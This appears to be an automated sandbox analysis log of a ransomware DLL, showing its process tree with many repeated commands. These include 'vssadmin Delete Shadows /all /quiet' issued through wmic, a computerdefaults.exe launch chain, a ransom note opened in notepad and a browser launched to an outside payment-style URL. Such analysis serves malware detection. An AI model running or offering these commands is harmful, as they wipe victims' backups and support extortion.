PID 2472 wrote to memory of 4860	2472	ComputerDefaults.exe	114
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116
PID 1108 wrote to memory of 1020	1108	msedge.exe	116

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
PID:2616
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5360
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1612
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5508
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5332
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2652
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:4228
- C:\Windows\system32\cmd.exe
  cmd /c "start http://8224c89032284020bcqbvpseec.gosmark.space/qbvpseec^&2^&33950848^&64^&319^&2219041"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3812
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://8224c89032284020bcqbvpseec.gosmark.space/qbvpseec&2&33950848&64&319&2219041
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:1108
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa39d846f8,0x7ffa39d84708,0x7ffa39d84718
      4⤵
      PID:1344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2068 /prefetch:2
      4⤵
      PID:1020
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2788
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2780 /prefetch:8
      4⤵
      PID:2012
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
      4⤵
      PID:3504
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
      4⤵
      PID:4576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:1
      4⤵
      PID:4852
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3668 /prefetch:1
      4⤵
      PID:4364
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4288 /prefetch:8
      4⤵
      PID:1612
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4288 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5400
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
      4⤵
      PID:5412
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:1
      4⤵
      PID:5420
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
      4⤵
      PID:6040
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3516 /prefetch:1
      4⤵
      PID:6140
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2672 /prefetch:1
      4⤵
      PID:5576
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3156 /prefetch:1
      4⤵
      PID:6120
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,356817647156429001,392645275705265335,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3204 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2100
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:436
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1404
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1588
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2264
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4648

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2824
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2376
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5972
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1168
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5944
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5308

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3596
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\377ea8e8c63f2b19b07c69492e99f3d8_JaffaCakes118.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:2164
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1340
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:1156
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:5336
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    PID:5232
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:5688
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4796
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2228
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:840
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5844
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5624

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:3732
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:2228
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1568
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1140
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3264
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4572

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Modifies registry class
PID:3920
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5092
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5740
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4024
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5756
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5392

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:4012
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5964
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:888
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:308

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:4076
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5900
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:636
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5528
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5184
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:1040

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:692

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:4136
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5216
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5228
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5180
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5188
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5556

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Modifies registry class
PID:3296
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1256
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1088
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1140

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3800
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4984
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5872
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5640
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5392
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5740

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
1⤵
PID:3108

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
- Checks processor information in registry
- Modifies registry class
PID:4964

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2396
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:748
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1088

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3280
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4860

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1568

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:532

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1904

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:432

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1704

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:748

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5132

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5160
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5296
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5500

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5180
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5324
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5572

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5600

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5700

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5644

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5596
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:1556
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5528

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5656
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3980
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5944

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5896

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2284

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5180

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5188
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:888
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5704

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5648
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:4860
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3104

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5836

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6012

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
